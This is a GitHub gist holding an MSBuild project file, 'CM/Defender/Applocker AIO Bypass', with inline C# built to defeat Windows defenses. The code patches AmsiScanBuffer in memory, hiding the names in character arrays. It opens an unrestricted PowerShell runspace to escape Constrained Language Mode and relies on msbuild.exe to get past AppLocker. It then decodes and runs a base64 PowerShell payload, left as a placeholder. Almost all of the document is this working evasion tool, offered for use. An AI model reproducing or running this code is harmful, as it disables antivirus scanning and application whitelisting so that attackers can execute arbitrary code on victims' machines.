Skip to content

Instantly share code, notes, and snippets.

@xct
Created May 29, 2019
Embed
What would you like to do?
CM/Defender/Applocker AIO Bypass
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe build.csproj -->
<Target Name="Bypass">
<BypassCLM/>
</Target>
<UsingTask
TaskName="BypassCLM"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Text;
using System.IO;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.ComponentModel;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Runtime.InteropServices;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
public class BypassCLM : Task, ITask
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
static int Bypass()
{
char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
String funcName = string.Join("", chars);
char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
String libName = string.Join("", chars2);
IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);
UIntPtr size = (UIntPtr)5;
uint p = 0;
VirtualProtect(Address, size, 0x40, out p);
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(Patch, 0, Address, 6);
return 0;
}
public override bool Execute()
{
Runspace run = RunspaceFactory.CreateRunspace();
run.Open();
Console.WriteLine(Bypass());
PowerShell shell = PowerShell.Create();
shell.Runspace = run;
byte[] data = Convert.FromBase64String("payload");
string exec = Encoding.Unicode.GetString(data);
shell.AddScript(exec);
shell.Invoke();
Collection<PSObject> output = shell.Invoke();
foreach( PSObject o in output )
{
Console.WriteLine(o.ToString());
}
foreach( ErrorRecord err in shell.Streams.Error )
{
Console.Write("Error: " + err.ToString());
}
run.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment